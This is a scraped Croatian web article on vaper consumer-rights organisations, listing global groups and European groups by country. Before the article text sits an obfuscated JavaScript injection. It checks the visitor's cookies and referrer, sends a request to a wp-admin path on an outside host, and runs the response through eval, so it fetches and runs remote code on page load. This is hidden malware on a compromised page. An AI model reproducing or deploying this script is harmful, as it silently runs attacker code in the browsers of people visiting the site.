;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vaperske organizacije i grupe za prava potrošača diljem svijeta

Trenutno postoji više od 50 skupina za prava potrošača e-cigareta i nikotina diljem svijeta, a stalno ih se stvara više. Za mnoge svjetske korisnike e-cigareta i grijanih duhanskih proizvoda nikada nije bilo lakše pronaći etabliranu skupinu potrošača koja se bori za zaštitu svog prava na korištenje niskorizičnih alternativa pušenju klasičnih cigareta.

Ali gotovo tri puta više zemalja nema potrošačku organizaciju. Među zemljama bez grupe koja predstavlja vapere su Australija, Japan, Izrael, Rusija, Turska i Poljska. Samo jedna zemlja u kojoj se govori arapski – Tunis – ima skupinu potrošača za vaping. Neke od tih zemalja zabranjuju prodaju nikotina, ali ne sve.

Čak i u zemljama s potrošačkim organizacijama, većina vapera ne sudjeluje. Oni možda nisu svjesni da potrošačke organizacije postoje – ili čak da su takve grupe potrebne. Drugi jednostavno ne razumiju da postoji rat protiv vapinga koji se može uspješno voditi samo zajedničkim udruživanjem. A neki pretpostavljaju da će im stalno prigovarati za donacije.

Većina grupa oslanja se na doprinose članova, ali malo njih naplaćuje definiranu članarinu. Budući da stječu poštovanje među izabranim dužnosnicima i regulatorima predstavljajući se kao legitimni predstavnici velikog broja potrošača, regrutiranje članova može biti čak i važnije od prikupljanja novca. Ove grupe žele i trebaju nove članove.

Veliki popis članova pruža popis kontakata ljudi koji su voljni telefonirati, slati pisma i stvarati buku na društvenim mrežama kada postoji opasnost od novih zabrana ili besmislenih zakona. Najuspješnije grupe imaju članove s različitim vještinama, često uključujući odvjetnike i pisce. Grupe se obično povezuju s vanjskim stručnjacima kao što su simpatični liječnici i akademici, koji su često voljni svjedočiti na saslušanjima u korist vapera.

Zašto vaperi trebaju vlastite organizacije?

Otkako je vaping stigao u Europu i Ameriku oko 2007., bio je izložen beskrajnim napadima dezinformiranih političara ili političara željnih publiciteta, nervoznih regulatora i profesionalnih organizacija protiv nikotina. Zapravo, prije nego što se pojavilo vaping, antinikotinske skupine uopće nisu marile za nikotin; nazivali su ih skupinama protiv pušenja, a cigarete su im bile glavna briga.

Ali vaping je sve to promijenio. Privlačna alternativa cigaretama koja nije nudila samo nikotin, već i mnoge osjetilne aspekte pušenja, e-cigarete su pomogle mnogim pušačima da ostave cigarete. I zbog tog uspjeha – i zato što vaping izgleda dovoljno slično pušenju da bi zastrašio antipušače – gotovo od prvog dana, vaping je izazivao sumnju, nerazumijevanje, strah i protivljenje skeptika i uvijek je zahtijevao strastvene branitelje kako bi bio dostupan i pristupačan .

Trgovačke organizacije koje predstavljaju proizvođače i prodavače proizvoda za vaping važan su dio borbe. Dobavljači koji se protive zakonima i propisima koji prijete njihovom poslovanju obično imaju veću financijsku moć od potrošača. Oni mogu angažirati lobiste i odvjetnike za borbu protiv lošeg zakonodavstva. Tipično, industrijske trgovačke skupine imaju dobre odnose sa skupinama potrošača.

Ali predstavnici industrije nemaju uvijek iste interese kao potrošači, a ponekad su spremni pregovarati o kompromisima koje sami vaperi nikada ne bi podržali. Na primjer, vape trgovine mogu biti voljne dopustiti zabranu internetske prodaje, neki proizvođači e-tekućina i trgovine podržavaju ograničenja jačine nikotina, a najveći proizvođači mogu podržati poreze na e-tekućine ili čak zabrane aroma. Trgovački predstavnici mogu preuveličati rizike izrade e-tekućine vlastitim rukama, što bi moglo dovesti do daljnjih zakonskih ograničenja.

Vaperi trebaju vlastitu reprezentaciju. Obično se organizacije potrošača vapinga bore za sve one koji koriste nove nikotinske alternative, bilo da koriste e-tekućinu, ili pod kapsule, grijane duhanske proizvode ili čak snus i druge nikotinske proizvode. Oni podržavaju načela smanjenja štete od pušenja (THR), koja zahtijevaju da vlasti dopuste prodaju niskorizičnih nikotinskih proizvoda i dijele istinite informacije o njima s potrošačima.

Globalne organizacije

International Network of Nicotine Consumer Organisations (INNCO)

Medical Organizations supporting Vaping and Electronic Cigarettes (M.O.V.E.)

Europa

Iako diljem svijeta postoji veliki broj vaperskih ogranizacija, za potrebe ovog članka zadržat ćemo se na onim euroskim koje možete pronaći na listi ispod:

Austrija

 • Österreichischer Dampferclub (ÖDC)

Belgija

 • Association Indépendante Des Utilisateurs de Cigarette Electronique (Aiduce)
 • Union Belge pour la Vape – Belgische Damp Bond (UBV-BDB)

Cipar

 • Cyprus Vaping Association (CVA)

Danska

 • Dansk e-Damper Forening (DADAFO)

Estonija

 • New Nicotine Alliance-Suitsuvaba Eesti (NNA-Smokefree Estonia)

Finska

 • Vapers Finland

Francuska

 • Association Indépendante Des Utilisateurs de Cigarette Electronique (Aiduce)
 • SOVAPE

Njemačka

 • Bundesverband Rauchfreie Alternative e.V. (BVRA)
 • Die Interessengemeinschaft E-Dampfen e.V. (IG-ED)
 • Die Interessengemeinschaft ExRaucher (ExRaucher IG)

Grčka

 • Κοινότητα Ελλήνων Ατμιστών (Greek Vapers Club)

Mađarska

 • Villanypára Egyesület (Electricity Steam Association)

Irska

 • New Nicotine Alliance Ireland (NNA-Ireland)

Italija

 • Associazione Nazionale per i Vapers Uniti (ANPVU)

Nizozemska

 • Actief Voor Dampen (AcVoDa)

Norveška

 • Nikotinalliansen Norge (Nikan)
 • Norsk Dampselskap (NDS)

Portugal

 • Associação Portuguesa de Vaporizadores (APORVAP)
 • Ohms Do Vapor

Rumunjska

 • Asociatia Consumatorilor de Produse Alternative cu Nicotina (ACPAN)

Slovenija

 • Združenje vejperjev Slovenije (ZVS)

Španjolska

 • Asociación Española de Usuarios de Vaporizadores Personales (ANESVAP)

Švedska

 • New Nicotine Alliance-Sweden (NNA-Sweden)

Ujedinjeno Kraljevstvo

 • New Nicotine Alliance (NNA-UK)
 • Snus Users Association
 • Vapers.org.uk
Choose your Reaction!
Leave a Comment